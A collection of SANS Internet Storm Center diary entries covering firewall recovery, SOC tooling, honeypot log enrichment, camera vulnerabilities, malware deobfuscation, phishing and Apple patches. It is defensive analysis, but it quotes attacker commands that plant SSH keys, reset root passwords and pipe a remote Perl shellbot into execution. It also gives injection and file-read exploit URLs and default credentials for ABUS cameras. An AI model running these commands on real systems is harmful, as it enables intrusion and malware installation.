SANS

Recently, I was involved in a network outage caused by a defective pfSense firewall appliance. Due to storage issues (with the onboard flash), the firewall did not boot anymore. This can be quickly solved from a hardware point of view because this firewall model has a slot to install an M2-compatible flash device and boot from it. But, there was a problem with the configuration. The last backup they had was pretty old, and they made a lot of changes. No debate about the fact that a robust backup process should have been implemented. Let's focus on the challenge of recovering the last configuration from the firewall. Challenge accepted!

First, I booted the firewall on an emergency USB stick and serial console access. First tip: always keep your console cables and emergency boot devices in a safe place. Once on the firewall, I tried to access the last configuration (stored as a big XML file) without luck. It was impossible to mount the corrupted filesystem. Because the file system was too big, it was impossible to take an image and store it on a USB key. Let's dump it through the network! I manually configured a NIC to connect to a server and used our best friend: netcat!

# dd if=/dev/mmcsd0 | nc 192.168.254.8 8888

Let's boot a SIFT Workstation to start a listener:

# nc -l -p 8888 >pfsense.raw

After a long time, I had an image of the corrupted file system on a remote host, ready to be investigated. I did not change the default block size ("bs") parameter to ensure a safe copy and avoid errors.

Now, let's find a way to extract interesting information from the disk image (remember, I need to extract the last configuration). I tried to mount the disk but again, no luck. So I decided to speed up the analysis and try to perform data carving. When data carving is mentioned, many people think about the tool bulk_extractor[1]. This tool tries to find interesting pieces of information from a disk image. It looks for "structured information" (email addresses, credit card numbers, URLs, images, ...). In my case, I was looking for a specific file and decided to use another tool: Scalpel[2]. This one performs file carving operations based on patterns that describe particular files or data fragment "types". You may define these patterns based on fixed strings or regular expressions. The tool is pretty old but you can find any modern file due to its flexible configuration. The good news is that Scalpel is installed on the SIFT Workstation[3]. By default, XML files are not carved. Let's enable this in the configuration file (/etc/scalpel/scalpel.conf). Just add the following line:

xml n 10000000 <?xml </pfsense>

This instructs Scalpel to search for XML files starting with "<?xml" and ending with "</pfsense>" (That's how pfSense configurations are stored). The file size is a maximum of 10M, and we don't verify the case ('n') in patterns.

Now, let's cross our fingers and scan the disk image:

# scalpel -v -c /etc/scalpel/scalpel.conf -o /tmp/carved pfsense.raw

Once the scan is completed, an audit file is generated:

Scalpel version 1.60 audit file Started at Thu May 22 12:28:06 2023 Command line: scalpel -c /etc/scalpel/scalpel.conf -o /tmp/carved pfsense.raw Output directory: /tmp/carved Configuration file: /etc/scalpel/scalpel.conf Opening target "H=" The following files were carved: File Start Chop Length Extracted From 00000003.xml 156532736 NO 8384365 pfsense.raw 00000002.xml 156368896 NO 8548205 pfsense.raw 00000001.xml 156303360 NO 8613741 pfsense.raw ...

This time, it was successful, and 52 files were carved. Which one is the right configuration? You need to remove the false positive ones (for example, the smallest ones). You can also grep for interesting strings. After a few extra checks, we were confident about the right file. We copied back to the firewall with the fresh install, rebooted, and the system was back alive!

In conclusion, DFIR techniques can be very helpful when your infrastructure is down, but it will cost time (read: money!). The best is, of course, to have a strong backup/restore process.

[1] https://github.com/simsong/bulk_extractor
[2] https://github.com/sleuthkit/scalpel
[3] https://www.sans.org/tools/sift-workstation/

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Recently I was discussing Alert/Case management tools for SOCs. I started thinking about what were the key points I used when deciding. Depending on how big your SOC is, you will have different priorities for each point if you have customer SLA's and a turnover. But these are the things I look for, in no particular order.

• Open Source
• Alert and Case Management
• Artifact Enhancement
• Playbook/Work Flows
• Metrics

 

TheHive (1)

This has been my favorite tool for managing cases for a while. In the last year, it has gone to a pay model, if you use TheHive version 5. Support for 4 has stopped, but you can still use it. I did a quick look, and I didn't see anyone with a Forked version 4 supporting it. Metrics in version 3 could have been better, and in 5, they have improved. It also supports marking cases with ATT&C techniques. Elastalert has direct support for Hive, which is an excellent and easy way to get alerts from SecurityOnion into your case system. They use Cortex for enhancing artifact information, which has a great plugin architecture. Most people are familiar with TheHive, so I'll skip any screenshots. It's a great project, and if you have the money to allocate, I suggest supporting this project for your SOC.

 

DFIR-IRIS (2)

It is a robust system that can run as a docker and the database is Postgres. In the latest revisions, released this month, they have added support for alert tracking. Alerts can be fed into their system using their API (No Elastalert support yet..) You can convert alerts into cases easily. You can create case templates that contain playbooks for what to do. If you put your information in the right places, the generated report feature does a very nice readable report. They currently do not have predefined ATT&CK techniques, but you can tag most items you add in cases. This project is very active and doing a great job with adding features. They already have a full demo online to try (3), so go take a look! 

  Alert queue

The alert queue was added in the latest release. There is an API to get alerts into the system. 

 

 

Case Management

 

At the top of the case, view is where you access the different parts of the case. Assets are where you list which assets are involved in the incident. Typically with TheHive, I would create a new task per device and put in the notes for each compromised asset. This is a nice feature to quickly see what is involved.

 

 

Notes Section

I've only messed around with the demo, but I'm unsure how to use the note section now. You can group things together nicely, but in real cases, I would have to see if the input fields from the tasks were not enough to meet the needs first.

 

 

Case Template/Playbooks

Creating templates is easy to do. These end up in the task area of the case, where they can be used to walk the responder through tasks for the case type.

 

 

You can add files to the case along with IOCs.

 

 

They do have some modules and enrichment, but only a little for now. A 3rd party module by SOCfortress will integrate with Cortex, giving you a ton of flexibility. (4)

 

 

There is at least one more alert manager I plan on covering in the future, but let me know what you are using and why you like it in the comments.

 

(1) https://thehive-project.org/

(2) https://dfir-iris.org/

(3)https://v200.beta.dfir-iris.org/welcome

(4)https://github.com/socfortress/iris-cortexanalyzer-module

 

 

--

Tom Webb

@tom_webb@infosec.exchange

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

While reviewing cowrie [1] logs from my honeypot [2] and developing my cowrieprocessor python script [3], I've been interested in adding information to understand more about some of the attack sources. 

• Are these attacks performed by people behind a keyboard or simply bots on the internet?
• Where are the attacks coming from?
• What infrastructure is being used to initiate the attack?

Through the process of trying to answer some of these quesitons, I've added several different enrichment options to this script, as long as an API key is supplied to use it. These include:

• SANS Internet Storm Center (ISC) API for WHOIS data [4]
• Virus Total API for hash lookups of uploaded/submitted files to the honeypot [5]
• URLhaus for malicious IP address data [6]
• SPUR.us for IP enrichment for WHOIS, infrastructure and VPN/proxy data [7]

Figure 1: Example honeypot data with additional SPUR.us enrichment

In addition to the most recent addition of SPUR.us over the last few days, I've also added the "duration" of the attack to my summaries to see if there were any interesting artifacts based on the timespan for the attack. For example, if an attack was being performed by an individual behind a keyboard, I would anticipate the duration to be longer. There were some other possibilities when thinking about a human actor behind a keyboard and what might be seen:

• Longer attack durations
• More use of VPNs or other anonymization services
• Mistyped commands
• Repeated commands back to back

These are just some of may hypotheses, but I figured a bit more data might help understand this a bit. Here is one example with data enrichment that now more definitively calls out that this might come from a datacenter network. 

Session fd5ac84ee8f9 Session Duration 10.40 seconds Protocol ssh Username root Password Admin123$ Timestamp 2023-05-24T06:23:58.906514Z Source IP Address 142.93.64.69 URLhaus IP Tags ASNAME DIGITALOCEAN-ASN ASCOUNTRY US Total Commands Run 20 SPUR ASN 14061 SPUR ASN Organization DIGITALOCEAN-ASN SPUR Organization DigitalOcean, LLC SPUR Infrastructure DATACENTER SPUR Client Proxies ['SHIFTER_PROXY'] SPUR Risks ['CALLBACK_PROXY'] SPUR Location Clifton, New Jersey, US ------------------- DOWNLOAD DATA ------------------- Download URL Download SHA-256 Hash a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 Destination File /root/.ssh/authorized_keys VT Description Text VT Threat Classification trojan.shell/linux VT First Submssion 2018-07-05 12:21:41 VT Malicious Hits 21 Download URL Download SHA-256 Hash 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b Destination File /etc/hosts.deny VT Description JavaScript VT Threat Classification VT First Submssion 2009-03-05 06:45:38 VT Malicious Hits 0 ////////////////// COMMANDS ATTEMPTED ////////////////// # cd ~; chattr -ia .ssh; lockr -ia .ssh # cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ # cat /proc/cpuinfo | grep name | wc -l # echo "root:J9uoMrirSMHb"|chpasswd|bash # rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; # cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' # free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' # ls -lh $(which ls) # which ls # crontab -l # w # uname -m # cat /proc/cpuinfo | grep model | grep name | wc -l # top # uname # uname -a # whoami # lscpu | grep Model # df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

We can also see that the attack duriation is 10 seconds, which is short when compared to most other attacks. There's also another nearly identical attack, but coming from a VPN. This VPN attack takes about 1.5 times longer, however. 

Session 909bea239054 Session Duration 26.73 seconds Protocol ssh Username root Password qwe@1234 Timestamp 2023-05-24T04:41:29.843213Z Source IP Address 43.154.116.34 URLhaus IP Tags ASNAME TENCENT-NET-AP-CN Tencent Building, Kejizhongyi Avenue ASCOUNTRY CN Total Commands Run 20 SPUR ASN 132203 SPUR ASN Organization Tencent Building, Kejizhongyi Avenue SPUR Organization 6 COLLYER QUAY SPUR Risks ['TUNNEL'] SPUR Services ['SSTP', 'OPENVPN'] SPUR Location Central, Central and Western District, HK SPUR Anonymous Tunnel True SPUR Tunnel Type VPN ------------------- DOWNLOAD DATA ------------------- Download URL Download SHA-256 Hash a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 Destination File /root/.ssh/authorized_keys VT Description Text VT Threat Classification trojan.shell/linux VT First Submssion 2018-07-05 12:21:41 VT Malicious Hits 21 Download URL Download SHA-256 Hash 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b Destination File /etc/hosts.deny VT Description JavaScript VT Threat Classification VT First Submssion 2009-03-05 06:45:38 VT Malicious Hits 0 ////////////////// COMMANDS ATTEMPTED ////////////////// # cd ~; chattr -ia .ssh; lockr -ia .ssh # cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ # cat /proc/cpuinfo | grep name | wc -l # echo "root:aeUVqyLmI0Sy"|chpasswd|bash # rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; # cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' # free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' # ls -lh $(which ls) # which ls # crontab -l # w # uname -m # cat /proc/cpuinfo | grep model | grep name | wc -l # top # uname # uname -a # whoami # lscpu | grep Model # df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

This doesn't say that one is definitely fully automated and the other is a person, but gives some more data points to compare two identical attacks. When looking at attacks with data being uploaded or downloaded to the honeypot, we can also get some additional data from those addreses as well. 

Session 8d39860bce79 Protocol ssh Username root Password qwerty123456 Timestamp 2023-05-22T16:48:41.724475Z Source IP Address 45.79.54.105 URLhaus IP Tags ASNAME LINODE-AP Linode, LLC ASCOUNTRY US Total Commands Run 1 SPUR ASN 63949 SPUR ASN Organization Akamai Connected Cloud SPUR Organization Linode SPUR Infrastructure DATACENTER SPUR Client Behaviors ['TOR_PROXY_USER'] SPUR Location Richardson, Texas, US ------------------- DOWNLOAD DATA ------------------- Download URL http[://]103[.]52[.]134[.]51/csx/perlNIK Download SHA-256 Hash bb4c8ee23103cd57741a1008552dae1038c17c505dd16f80571d795d91892cad Destination File VT Description Perl VT Threat Classification trojan.perl/shellbot VT First Submssion 2023-05-15 07:28:09 VT Malicious Hits 39 Download Source Address 103.52.134.51 URLhaus IP Tags ASNAME MCN-BD Kazi Sazzad Hossain TA Millennium Computers & Networking ASCOUNTRY BD SPUR ASN 63949 SPUR ASN Organization Akamai Connected Cloud SPUR Organization Linode SPUR Infrastructure DATACENTER SPUR Client Behaviors ['TOR_PROXY_USER'] SPUR Location Richardson, Texas, US ////////////////// COMMANDS ATTEMPTED ////////////////// # wget -qO - 103.52.134.51/csx/perlNIK|perl

In the future I may also added some additional sources such as Shodan [8], but I also want to keep the summaries as short as possible so that they can be quickly reviewed.

Let me know if you think there's a good source of data to give more context to these kinds of logs.

[1] https://github.com/cowrie/cowrie
[2] https://github.com/DShield-ISC/dshield
[3] https://github.com/jslagrew/cowrieprocessor
[4] https://isc.sans.edu/api/
[5] https://developers.virustotal.com/reference/overview
[6] https://urlhaus.abuse.ch/
[7] https://spur.us/
[8] https://www.shodan.io/

--
Jesse La Grew
Handler

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Please let me know if you have any idea what they are trying to do here :)

I noticed today that our honeypots detected a few scans for Apache "Nifi." Nifi is a Java-based system that allows for the routing of data. It will enable you to select data from a source (let's say from a CSV file) and output it to a database. Numerous sources and destinations are supported. Dataflows are created via a web-based GUI. One critical use case of Apache Nifi is to prepare and import data into machine learning systems.

Today, I noticed a spike in requests for the URL "/nifi", the default URL used for the NiFi GUI.

Almost all the reports come from the same user-agent and IP address:

User-Agent: Go-http-client/1.1
Source IP: %%ip:109.207.200.43%%

The source IP, located in the Ukraine, has a history of scanning for various vulnerabilities, but nothing I would assign to a particular bot. Just "random" URLs like:

• /boaform/admin/formLogin
• blank.org:443

There are a couple other IPs and User-Agents used to scan for Nifi:

%%ip:65.154.226.171%% - Claiming to use headless chrome on Linux and Chrome on Windows. Reasonably recent versions so they may be real user agents.
%%ip:205.169.39.250%% - Claiming to use Chrome, but ancient versions so I assume these user agents are fake

Both of these IPs are part of Qwest/CenturyLink/Lumen. 65.154.226.171 at least used to be part of Paloalto.

But the real question: What are they looking for? Trying to steal data from badly secured NiFi installs? Poisoning ML data? cryptomining... ? There isn't a vulnerability that I would consider, other than bad configurations with no/weak/default passwords.

Let me know if you use NiFi, and if you have an idea what they may be looking for.

 

 

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

ABUS is usually better known for its "old-fashioned" mechanical locks. But as part of its b "Industry Solution" portfolio of products, ABUS is offering some more high-tech solutions, like, for example, network-connected cameras [1]. Sadly, these cameras suffer from some of the same vulnerabilities as many similar cameras.

In February, Peter Ohm disclosed a vulnerability affecting ABUS cameras on the full disclosure mailing list [2]. The disclosure includes three different vulnerabilities,

1 - Local File Inclusion

This vulnerability can be used to read arbitrary files:

cgi-bin/admin/fileread?READ.filePath=[filename]

 

2 - Remote command injection vulnerability

/cgi-bin/mft/wireless_mft?ap=irrelevant;[command]

This vulnerability allows for arbitrary command injection. Instead of a semicolon, an attacker could also use a pipe or a carriage return.

3 - Fixed "maintenance" account

The affected cameras use the following credentials for a built-in "maintenance" account.

manufacture erutcafunam

 

Among these vulnerabilities, the remote command execution vulnerability is the most interesting one. Yesterday, our sensor picked up exploit attempts consistent with this vulnerability:

/cgi-bin/mft/wireless_mft?ap=irrelevant;{payload}

I did not obfuscate the command. The attacker did not correctly expand the command parameter. Maybe they are using a Python "f-string" but forgot the leading "f"?

All the attacks originate from an unconfigured server (%%ip:45.95.147.229%%) in the Netherlands. This server has a history of attempts to exploit various common vulnerabilities.

But there is more...

Our web application honeypots have been around for a while, so we have some history to look back at. Similar exploit attempts are going back to 2015:

+------------+--------------------------------------------------------------------+
| date       | url                                                                |
+------------+--------------------------------------------------------------------+
| 2015-07-12 | /cgi-bin/mft/wireless_mft                                          |
| 2015-07-13 | /cgi-bin/mft/wireless_mft                                          |
| 2015-07-13 | /cgi-bin/mft/wireless_mft?ap=testname;cat%20/var/www/secret.passwd |
| 2021-12-13 | /cgi-bin/mft/wireless_mft?ap=travesti;id                           |
| 2021-12-13 | /cgi-bin/mft/wireless_mft?ap=travesti;ipconfig                     |
| 2021-12-17 | /cgi-bin/mft/wireless_mft?ap=travesti;id                           |
| 2021-12-17 | /cgi-bin/mft/wireless_mft?ap=travesti;ipconfig                     |
| 2022-01-22 | /cgi-bin/mft/wireless_mft?ap=travesti;id                           |
| 2022-01-22 | /cgi-bin/mft/wireless_mft?ap=travesti;ipconfig                     |
| 2023-05-20 | /cgi-bin/mft/wireless_mft                                          |
| 2023-05-21 | /cgi-bin/mft/wireless_mft?ap=irrelevant;{payload}                  |
+------------+--------------------------------------------------------------------+

Back in 2015, CORE security released a very similar vulnerability in "Air Live" cameras [3][4]. Searching further shows that this vulnerability was also found in 2013 Zavio IP Cameras [5]. 

So this appears to be one of these all too common "IoT" security issues: The same firmware/hardware is being resold under different brands, and once a vendor fixes the flaw does in no way guarantee that other vendors selling the same equipment will even bother to look if they are vulnerable as well. ABUS likely is just the sales organization feeling zero responsibility to check if what they are selling is remotely fit to be connected to a network.

As a user of such a camera, you must ensure that you keep your firmware up to date and avoid exposing these cameras to the internet. And as ABUS puts it: "KEEP AN EYE ON EVERYTHING.", most notably your vendors.

[1] https://mobil.abus.com/usa/Commercial-Security/Industry-solutions/Campus-Security
[2] https://seclists.org/fulldisclosure/2023/Feb/16
[3] https://seclists.org/fulldisclosure/2015/Jul/29
[4] http://camera.airlive.com/
[5] https://www.exploit-db.com/exploits/25815

---

Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

This is part three of a diary entry series. Part one can be found here and part two can be found here.

We ended with the download of a new payload: a .bat file.

Let's take a look:

That looks like more BASE64 code. Let's check with base64dump.py:

Indeed, we have rather 2 long BASE64 strings. So maybe 2 payloads. Or a payload and a loader.

What do we find after the BASE64 code:

A BAT file with obfuscated commands. A lot of 3 letter strings between exclamation marks (!).

The one circled in red draws my attention: !tHB!. If I remove that string, I end up with .exe.

So I try a sed command to remove all occurence of 3 characters surrounded by exclamation marks. I do this with regular expression !...!

The result looks like another PowerShell script:

With more obfuscation: I have to remove string pCpCh too.

And we end up with another PowerShell script. It looks similar to the one we analyzed in part 2: another decryptor.

We are again dealing with AES encryption (1), CBC mode this time (2), the key is BASE64-encoded (3) and the initialisation vector too (4). And there is also GZIP decompression (5).

So let's adapt our decryption script from part 2 a bit:

from Crypto.Cipher import AES import gzip from Crypto.Util.Padding import pad, unpad def Transform(items, options): if options.parameter == '2': ciphertext = items[1]['content'] else: ciphertext = items[0]['content'] key = items[2]['content'] iv = items[3]['content'] oAES = AES.new(key, AES.MODE_CBC, iv) cleartext = unpad(oAES.decrypt(ciphertext), AES.block_size) transformed = gzip.decompress(cleartext) return transformed

There are several differences here: we use CBC mode, we have an initialisation vector (iv), and we have to do unpadding (unpad).

And since we have 2 payloads to decrypt this time, we use myjson-transform.py's option -p (--paramter) to specify which payload we want to decrypt.

If -p is equal to '2', we take the second payload (items[1]), otherwise we take the first payload (items[0]).

This is the output from base64dump.py:

We have our 2 payloads, the key and the iv.

We let base64dump.py produce JSON output and feed this into myjson-transform.py with decrypt-2.py script. As I suspect that this payload will be binary (PE file), I do an ASCII dump (-A) of the decrypted data:

This looks indeed like a PE file. Let's verify with my pecheck.py tool:

It's a .NET assembly: 5c5f55987a79e29a3bc46aeeb78209331d6cdbb4d1dde7f24a0b41ae51b5de8f.

Let's take a look at the second payload, using -p 2:

That one too is a .NET assembly: 5f5b1e4a6cb96f0611a8374e504cee8ceb7dc59dedf0f4059fd93dcd8315699c.

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

While reviewing my last findings today, I found a phishing email that delivered a classic .shtml file called "PROFORMA INVOICE.shtml". Right now, nothing special, emails like this one are widespread. When you open the file in a sandbox, it reveals a classic form:

The potential victim is asked to enter his/her M365 credentials to reveal the Excel sheet (the email address has been obfuscated). I had a quick look at the HTML code and found something interesting in the HTTP form:

<input type="hidden" name="ip" id="hIP">

This means that a variable called "ip" will be submitted to the form simultaneously with the credentials. While checking deeper, there was some obfuscated JavaScript code below in the code:

<script> const getip = async () => { const payl = await postData("https://api.ipify.org/?format=json", {}, "GET"); document.getElementById("hIP").value = payl.ip; return payl.ip; } getip(); async function postData(url = '', data = {}, method="POST") { const response = await fetch(url, { method, mode: 'cors', cache: 'no-cache', headers: { 'Content-Type': 'application/json' }, body: (method.toLowerCase() === "post") ? JSON.stringify(data) : null }); return response.json(); // parses JSON response into native JavaScript objects } </script>

The line in red assigns the victim's public IP address to hIP that will be exfiltrated with the credentials.

Note that this piece of JavaScript is a perfect example of how to contact an API and extract data from the JSON response!

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

 

A reader contacted us (thank you, Scott) to share an interesting phishing email. We are always looking for fresh meat, don't hesitate to share your samples with us! I had a look at the EML file provided by Scott, and it looked indeed weird. 

When you open the mail in Outlook, it looks like this:

You could think that first reflex, this is a phishing campaign targeting Chinese people. If we look a bit deeper, we see that the document is lacking any "format" (paragraphs, carriage returns, ...), and there are here and there "emoticons". This looks definitively like an encoding problem.

If you check the raw EML file, there is this piece of code at the beginning of the mail body:

<=00m=00e=00t=00a=00 =00h=00t=00t=00p=00-=00e=00q=00u=00i=00v=00=3D=00"=00C= =00o=00n=00t=00e=00n=00t=00-=00T=00y=00p=00e=00"=00 =00c=00o=00n=00t=00e=00= n=00t=00=3D=00"=00t=00e=00x=00t=00/=00h=00t=00m=00l=00;=00 =00c=00h=00a=00r= =00s=00e=00t=00=3D=00u=00t=00f=00-=001=006=00"=00>=00<html><head><meta http= -equiv=3D"Content-Type" content=3D"text/html; charset=3Dunicode"> =20 <meta http-equiv=3D"X-UA-Compatible" content=3D"IE=3Dedge"> <title></title>= </head>=20 <body>

Export the body and open it in a text editor, you will get:

As you can see, the attacker messed up the encoding, and Outlook cannot display the mail body correctly. Here is what should be displayed:

Note that the attackers not only messed up with the encoding, they also messed up the variable replacement with correct values ("[EMail]", "[Date_short]", ...).

The link points to a Java RAT stored on the Discord CDN[1]. The RAT connects to its C2 server via magicfinger[.]ddns[.]net

[1] https://bazaar.abuse.ch/sample/d7b24068f673031c8c27271bf36790f9468b8c27ec08c51a348fc08c34ff6881/

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Today, Apple released macOS, iOS, iPadOS, tvOS, watchOS, and Safari updates.

Three of the vulnerabilities are already exploited in the wild. Combining the three vulnerabilities, an attacker can gain complete system access as the user visits a malicious website. CVE-2023-32373 allows for arbitrary code execution as WebKit processes malicious content. CVE-2023-32409, in turn, enables breaking out of the web content sandbox, completing the full system compromise. The vulnerabilities are not indicated as "patched" for older versions of macOS, but they are covered in the Safari update, which applies the patch to older versions of macOS.

As usual, Apple's vulnerability descriptions are terse. As promised in a prior diary, I let ChatGPT "guess" the CVSS score for these updates. Let me know if you agree or not. The rating (moderate/important/critical) are mine. ChatGPT refused to provide a CVSS score for some vulnerabilities based on insufficient information. Let me know if you feel ChatGPT did ok or not (or if it is worthwhile keeping these ChatGPT CVSS scores or not)

Safari 16.5 watchOS 9.5 tvOS 16.5 iOS 16.5 and iPadOS 16.5 iOS 15.7.6 and iPadOS 15.7.6 macOS Big Sur 11.7.7 macOS Ventura 13.4 macOS Monterey 12.6.6 CVE-2023-32402 [moderate] ChatGPT-CVSS: 4.3 WebKit
An out-of-bounds read was addressed with improved input validation.
Processing web content may disclose sensitive information x x x x     x   CVE-2023-32423 [moderate] ChatGPT-CVSS: 5.3 WebKit
A buffer overflow issue was addressed with improved memory handling.
Processing web content may disclose sensitive information x x x x     x   CVE-2023-32409 [moderate] ChatGPT-CVSS: 8.8 *** EXPLOITED *** WebKit
The issue was addressed with improved bounds checks.
A remote attacker may be able to break out of Web Content sandbox. Apple is aware of a report that this issue may have been actively exploited. x x x x     x   CVE-2023-28204 [moderate] ChatGPT-CVSS: 7.5 *** EXPLOITED *** WebKit
An out-of-bounds read was addressed with improved input validation.
Processing web content may disclose sensitive information. Apple is aware of a report that this issue may have been actively exploited. x x x x x   x   CVE-2023-32373 [critical] ChatGPT-CVSS: 8.8 *** EXPLOITED *** WebKit
A use-after-free issue was addressed with improved memory management.
Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited. x x x x x   x   CVE-2023-32388 [important] ChatGPT-CVSS: N/A Accessibility
A privacy issue was addressed with improved private data redaction for log entries.
An app may be able to bypass Privacy preferences   x   x x x x x CVE-2023-32400 [moderate] ChatGPT-CVSS: N/A Accessibility
This issue was addressed with improved checks.
Entitlements and privacy permissions granted to this app may be used by a malicious app   x   x     x   CVE-2023-32399 [important] ChatGPT-CVSS: 4.3 Core Location
The issue was addressed with improved handling of caches.
An app may be able to read sensitive location information   x x x     x   CVE-2023-28191 [important] ChatGPT-CVSS: N/A AppleEvents
This issue was addressed with improved redaction of sensitive information.
An app may be able to bypass Privacy preferences   x x x   x x x CVE-2023-32417 [moderate] ChatGPT-CVSS: 4.0 Face Gallery
This issue was addressed by restricting options offered on a locked device.
An attacker with physical access to a locked Apple Watch may be able to view user photos or contacts via accessibility features   x             CVE-2023-32392 [important] ChatGPT-CVSS: 4.3 GeoServices
A privacy issue was addressed with improved private data redaction for log entries.
An app may be able to read sensitive location information   x x x   x x x CVE-2023-32372 [important] ChatGPT-CVSS: 5.3 ImageIO
An out-of-bounds read was addressed with improved input validation.
Processing an image may result in disclosure of process memory   x x x     x   CVE-2023-32384 [critical] ChatGPT-CVSS: 7.8 ImageIO
A buffer overflow was addressed with improved bounds checking.
Processing an image may lead to arbitrary code execution   x x x x x x x CVE-2023-32354 [important] ChatGPT-CVSS: 7.5 IOSurfaceAccelerator
An out-of-bounds read was addressed with improved input validation.
An app may be able to disclose kernel memory   x x x         CVE-2023-32420 [moderate] ChatGPT-CVSS: 7.5 IOSurfaceAccelerator
An out-of-bounds read was addressed with improved input validation.
An app may be able to cause unexpected system termination or read kernel memory   x x x     x   CVE-2023-27930 [important] ChatGPT-CVSS: 8.8 Kernel
A type confusion issue was addressed with improved checks.
An app may be able to execute arbitrary code with kernel privileges   x x x     x   CVE-2023-32398 [important] ChatGPT-CVSS: 8.8 Kernel
A use-after-free issue was addressed with improved memory management.
An app may be able to execute arbitrary code with kernel privileges   x x x x x x x CVE-2023-32413 [important] ChatGPT-CVSS: 8.8 Kernel
A race condition was addressed with improved state handling.
An app may be able to gain root privileges   x x x x x x x CVE-2023-32352 [important] ChatGPT-CVSS: 7.0 LaunchServices
A logic issue was addressed with improved checks.
An app may bypass Gatekeeper checks   x   x   x x x CVE-2023-32407 [important] ChatGPT-CVSS: N/A Metal
A logic issue was addressed with improved state management.
An app may be able to bypass Privacy preferences   x x x x x x x CVE-2023-32368 [important] ChatGPT-CVSS: 6.5 Model I/O
An out-of-bounds read was addressed with improved input validation.
Processing a 3D model may result in disclosure of process memory   x x x     x x CVE-2023-32403 [important] ChatGPT-CVSS: 4.3 NetworkExtension
This  issue was addressed with improved redaction of sensitive information.
An app may be able to read sensitive location information   x x x x x x x CVE-2023-32390 [moderate] ChatGPT-CVSS: 4.3 Photos
The issue was addressed with improved checks.
Photos belonging to the Hidden Photos Album could be viewed without authentication through Visual Lookup   x   x     x   CVE-2023-32357 [moderate] ChatGPT-CVSS: 7.0 Sandbox
An authorization issue was addressed with improved state management.
An app may be able to retain access to system configuration files even after its permission is revoked   x x x   x x x CVE-2023-32391 [moderate] ChatGPT-CVSS: N/A Shortcuts
The issue was addressed with improved checks.
